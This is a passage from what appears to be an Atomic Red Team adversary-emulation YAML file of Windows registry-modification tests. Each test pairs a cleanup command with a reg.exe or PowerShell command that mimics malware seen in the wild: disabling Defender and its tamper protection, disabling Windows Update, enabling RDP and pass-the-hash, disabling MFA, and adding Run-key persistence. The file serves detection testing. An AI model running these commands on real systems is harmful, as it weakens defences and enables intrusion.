  supported_platforms:
  - windows
  executor:
    command: |
      REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
    cleanup_command: |
      reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /f
    name: command_prompt
    elevation_required: true
- name: Disable Windows Toast Notifications
  auto_generated_guid: 003f466a-6010-4b15-803a-cbb478a314d7
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification.
    See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f
    cleanup_command: |
      reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Disable Windows Security Center Notifications
  auto_generated_guid: 45914594-8df6-4ea9-b3cc-7eb9321a807e
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows security center notification.
    See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /t REG_DWORD /d 0 /f
    cleanup_command: |
      reg delete HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Suppress Win Defender Notifications
  auto_generated_guid: c30dada3-7777-4590-b970-dc890b8cf113
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to suppress the windows defender notification.
    See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Allow RDP Remote Assistance Feature
  auto_generated_guid: 86677d0e-0b5e-4a2b-b302-454175f9aa9e
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to allow rdp remote assistance feature. This feature allow specific
    user to rdp connect on the targeted machine.
    See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: NetWire RAT Registry Key Creation
  auto_generated_guid: 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
  description: |
    NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
    See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ  /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
      reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
      reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
    cleanup_command: |
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
      reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
      reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
    name: command_prompt
- name: Ursnif Malware Registry Key Creation
  auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
  description: |
    Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
    More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY  /d 72656463616e617279 /f
    cleanup_command: |
      reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
      reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
    name: command_prompt
- name: Terminal Server Client Connection History Cleared
  auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
  description: |
    The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
  supported_platforms:
  - windows
  dependency_executor_name: powershell
  dependencies:
  - description: |
      Must have the "MR9" Remote Desktop Connection history Key 
    prereq_command: |
      if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}
    get_prereq_command: |
      New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client"  -ErrorAction Ignore
      New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
      New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1"  -PropertyType "String" -ErrorAction Ignore
      New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
      New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
  executor:
    command: |
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
    name: command_prompt
    elevation_required: true
- name: Disable Windows Error Reporting Settings
  auto_generated_guid: d2c9e41e-cd86-473d-980d-b6403562e3e1
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems 
    encounter in specific application or process.
    See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
      reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: DisallowRun Execution Of Certain Applications
  auto_generated_guid: 71db768a-5a9c-4047-b5e7-59e01f188e84
  description: |
    Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it 
    using security product.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art1 /d "regedit.exe"
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art2 /d "cmd.exe"
    cleanup_command: |
      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art1 /f >nul 2>&1
      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art2 /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Enabling Restricted Admin Mode via Command_Prompt
  auto_generated_guid: fe7974e5-5813-477b-a7bd-311d4f535e83
  description: |
    Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP.

    See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
    cleanup_command: |
      reg delete "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Mimic Ransomware - Enable Multiple User Sessions
  auto_generated_guid: 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3
  description: |
    This test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key. 
    See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
  supported_platforms:
  - windows
  executor:
    command: |
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /t REG_DWORD /v AllowMultipleTSSessions /d 1 /f
    cleanup_command: |
      reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /v AllowMultipleTSSessions /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Mimic Ransomware - Allow Multiple RDP Sessions per User
  auto_generated_guid: 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9
  description: |
    This test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key. 
    See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
    cleanup_command: |
      reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /f >nul 2>&1
    name: command_prompt
    elevation_required: true
- name: Event Viewer Registry Modification - Redirection URL
  auto_generated_guid: 6174be7f-5153-4afd-92c5-e0c3b7cdb5ae
  description: Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will open the URL or execute the program defined in the redirection URL registry entry.
  supported_platforms:
  - windows
  input_arguments:
    redirection_url:
      description: URL to open or file URI to execute upon opening the event help
      type: url
      default: file://C:\windows\system32\notepad.exe
  executor:
    command: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionURL /t REG_SZ /d "#{redirection_url}" /f
    cleanup_command: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionURL /t REG_SZ /d "http://go.microsoft.com/fwlink/events.asp" /f
    name: command_prompt
    elevation_required: true
- name: Event Viewer Registry Modification - Redirection Program
  auto_generated_guid: 81483501-b8a5-4225-8b32-52128e2f69db
  description: Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.
  supported_platforms:
  - windows
  input_arguments:
    redirection_program:
      description: Path of the program to execute upon opening the event help
      type: path
      default: C:\windows\system32\notepad.exe
  executor:
    command: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /d "#{redirection_program}" /f
    cleanup_command: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /f
    name: command_prompt
    elevation_required: true
- name: Enabling Remote Desktop Protocol via Remote Registry
  auto_generated_guid: e3ad8e83-3089-49ff-817f-e52f8c948090
  description: |
    Enabling RDP through remote registry.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
    cleanup_command: |
      reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 2 /f
    name: command_prompt
    elevation_required: true
- name: Disable Win Defender Notification
  auto_generated_guid: 12e03af7-79f9-4f95-af48-d3f12f28a260
  description: |
    Disable Win Defender Notification. Redline is using this to disable this win defender feature.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 0 /f
    name: command_prompt
    elevation_required: true
- name: Disable Windows OS Auto Update
  auto_generated_guid: 01b20ca8-c7a3-4d86-af59-059f15ed5474
  description: |
    Disable Auto Update Windows OS feature. Redline is using this as part of its defense evasion.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 0 /f
    name: command_prompt
    elevation_required: true
- name: Disable Windows Auto Reboot for current logon user
  auto_generated_guid: 396f997b-c5f8-4a96-bb2c-3c8795cf459d
  description: |
    Disable Windows Auto Reboot for current logon user. Redline is using this as part of its defense evasion.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0 /f
    name: command_prompt
    elevation_required: true
- name: Windows Auto Update Option to Notify before download
  auto_generated_guid: 335a6b15-b8d2-4a3f-a973-ad69aa2620d7
  description: |
    Windows Auto Update Option to Notify before download. Redline is using this as part of its defense evasion.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 2 /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 3 /f
    name: command_prompt
    elevation_required: true
- name: Do Not Connect To Win Update
  auto_generated_guid: d1de3767-99c2-4c6c-8c5a-4ba4586474c8
  description: |
    Do Not Connect To Win Update. Redline is using this as part of its defense evasion.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1 /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0 /f
    name: command_prompt
    elevation_required: true
- name: Tamper Win Defender Protection
  auto_generated_guid: 3b625eaa-c10d-4635-af96-3eae7d2a2f3c
  description: |
    Tamper Win Defender Protection. RedLine Stealer is executing another component file to modify this win defender feature in registry. 
    Take note that this modification might not be enough to disable this feature but can be a good indicator of malicious process that 
    tries to tamper this Win Defender feature settings.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5 /f
    name: command_prompt
    elevation_required: true
- name: Snake Malware Registry Blob
  auto_generated_guid: 8318ad20-0488-4a64-98f4-72525a012f6b
  description: |
    The following Atomic Test creates a registry blob in HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds, which is related to Snake Malware. Per the report, upon execution, Snake's WerFault.exe will attempt to decrypt an encrypted blob within the Windows
    registry that is typically found at HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds. The encrypted data includes the AES key, IV, and path that is used to find and decrypt the file containing Snake's kernel driver and kernel driver loader.
  supported_platforms:
  - windows
  executor:
    command: |
      $typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; $randomBytes = New-Object Byte[] 0x1000; (New-Object Random).NextBytes($randomBytes); New-ItemProperty -Path $typicalPath -Name "AtomicSnake" -Value $randomBytes -PropertyType Binary -Force | Out-Null
    cleanup_command: |
      $typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; Remove-ItemProperty -Path $typicalPath -Name "AtomicSnake" -ErrorAction SilentlyContinue | Out-Null
    name: powershell
    elevation_required: true
- name: Allow Simultaneous Download Registry
  auto_generated_guid: 37950714-e923-4f92-8c7c-51e4b6fffbf6
  description: |
    A registry modification to allow Simultaneous download in the system.
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
    cleanup_command: |
      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
    name: command_prompt
    elevation_required: true
- name: Modify Internet Zone Protocol Defaults in Current User Registry - cmd
  auto_generated_guid: c88ef166-50fa-40d5-a80c-e2b87d4180f7
  description: |
    This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using the reg.exe utility via the command prompt. Such modifications can be indicative of an adversary trying to weaken browser security settings. Upon execution, if successful, the message "The operation completed successfully." will be displayed.
    To verify the effects of the test:
    1. Open the Registry Editor (regedit.exe).
    2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults".
    3. Check for the presence of the "http" and "https" DWORD values set to `0`.
    Or run:
    ```batch
    reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults"
    ```
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 0 /F
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 0 /F
    cleanup_command: |
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 3 /F
      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 3 /F
    name: command_prompt
- name: Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell
  auto_generated_guid: b1a4d687-ba52-4057-81ab-757c3dc0d3b5
  description: |
    This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using PowerShell. Such modifications can be indicative of an adversary attempting to weaken browser security settings. 
    To verify the effects of the test:
    1. Open the Registry Editor (regedit.exe).
    2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults".
    3. Check for the presence of the "http" and "https" DWORD values set to `0`.
    Or run:
    ```powershell
    Get-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' | Select-Object http,https
    ```
  supported_platforms:
  - windows
  executor:
    command: |
      # Set the registry values for http and https to 0
      Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'http' -Value 0
      Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'https' -Value 0
    cleanup_command: |
      # Restore the registry values for http and https to 3
      Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'http' -Value 3
      Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'https' -Value 3
    name: powershell

- name: Activities To Disable Secondary Authentication Detected By Modified Registry Value.
  auto_generated_guid: c26fb85a-fa50-4fab-a64a-c51f5dc538d5
  description: |
    Detect the disable secondary authentication activities that adversary attempt to bypass MFA and to get the unauthorized access to the system or sensitive data.
    See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.SecondaryAuthenticationFactor::MSSecondaryAuthFactor_AllowSecondaryAuthenticationDevice).
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "AllowSecondaryAuthenticationDevice" /t REG_DWORD /d 0 /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "AllowSecondaryAuthenticationDevice" /t REG_DWORD /d 1 /f
    name: command_prompt
    
- name: Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.
  auto_generated_guid: ffeddced-bb9f-49c6-97f0-3d07a509bf94
  description: |
    Detect the Microsoft FIDO authentication disable activities that adversary attempt to gains access to login credentials (e.g., passwords), they may be able to impersonate the user and access sensitive accounts or data and also increases the risk of falling victim to phishing attacks.
    See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.FidoAuthentication::AllowFidoDeviceSignon).
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /t REG_DWORD /d 0 /f
    cleanup_command: |
      reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /t REG_DWORD /d 1 /f
    name: command_prompt  

- name: Scarab Ransomware Defense Evasion Activities
  auto_generated_guid: ca8ba39c-3c5a-459f-8e15-280aec65a910
  description: |
    Scarab Ransomware defense evasion activities that can abuse the registry values to modify the settings of the Credential Security Support Provider to overcome potential RDP connection issues.
    [Scarab Ransomware Article](https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/)
  supported_platforms:
  - windows
  executor:
    command: |
      reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f
    cleanup_command: |
       reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 0 /f
    name: command_prompt

- name: Disable Remote Desktop Anti-Alias Setting Through Registry
  auto_generated_guid: 61d35188-f113-4334-8245-8c6556d43909
  description: |
    A modification registry to disable RDP anti-alias settings. This technique was seen in DarkGate malware as part of its installation
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 1 /f
    cleanup_command: |
       reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 0 /f
    name: command_prompt
  
- name: Disable Remote Desktop Security Settings Through Registry
  auto_generated_guid: 4b81bcfa-fb0a-45e9-90c2-e3efe5160140
  description: |
    A modification registry to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
    cleanup_command: |
       reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 0 /f
    name: command_prompt

- name: Disabling ShowUI Settings of Windows Error Reporting (WER)
  auto_generated_guid: 09147b61-40f6-4b2a-b6fb-9e73a3437c96
  description: |
    A modification registry to disable ShowUI settings of Windows Error Report. This registry setting can influence the behavior of error reporting dialogs or prompt box. 
    This technique was seen in DarkGate malware as part of its installation.
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 1 /f
    cleanup_command: |
       reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 0 /f
    name: command_prompt

- name: Enable Proxy Settings
  auto_generated_guid: eb0ba433-63e5-4a8c-a9f0-27c4192e1336
  description: |
    A modification registry to enable proxy settings. This technique was seen in DarkGate malware as part of its installation.
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
    cleanup_command: |
       reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
    name: command_prompt

- name: Set-Up Proxy Server
  auto_generated_guid: d88a3d3b-d016-4939-a745-03638aafd21b
  description: |
    A modification registry to setup proxy server. This technique was seen in DarkGate malware as part of its installation.
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
    cleanup_command: |
       reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /f
    name: command_prompt


- name: RDP Authentication Level Override
  auto_generated_guid: 7e7b62e9-5f83-477d-8935-48600f38a3c6
  description: |
    A modification registry to override RDP Authentication Level. This technique was seen in DarkGate malware as part of its installation.
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
    cleanup_command: |
       reg delete "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride
    name: command_prompt
- name: Enable RDP via Registry (fDenyTSConnections)
  auto_generated_guid: 16bdbe52-371c-4ccf-b708-79fba61f1db4
  description: |
    Modify the registry value of fDenyTSConnections to allow incoming RDP connections. 
    This activity has been observed by multiple ransomware groups, including Hive ransomware. 
    [Reference](https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/)
  supported_platforms:
  - windows
  input_arguments:
    remove_rdp_access_during_cleanup:
      description: Set to 1 if you want the cleanup to remove RDP access to machine
      type: integer
      default: "0"
  executor:
    command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    cleanup_command: 'if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)'
    name: command_prompt
    elevation_required: true   
- name: Disable Windows Prefetch Through Registry 
  auto_generated_guid: 7979dd41-2045-48b2-a54e-b1bc2415c9da
  description: |
    Modify the registry of the machine to disable prefetch. Disabling prefetch will remove one artifact for evidence of application execution. Restart is required post modification
  supported_platforms:
  - windows
  executor:
    command: | 
       reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
    cleanup_command: |
       reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 3 /f
    name: command_prompt
    elevation_required: true
- name: Setting Shadow key in Registry for RDP Shadowing
  auto_generated_guid: ac494fe5-81a4-4897-af42-e774cf005ecb
  description: |-
    Microsoft Remote Desktop Protocol (RDP) supports a “shadowing” feature and RDP is available in all Windows Server Operating Systems and the business editions of end-user Windows versions.
    In order to use the RDP shadowing feature, the Remote Desktop Services (TermService) service needs to be running (which it does by default), a rule needs to be enabled in the Windows Firewall and in case of stealth reasons, a setting needs to be configured to not prompt the user for permission when they are being shadowed.
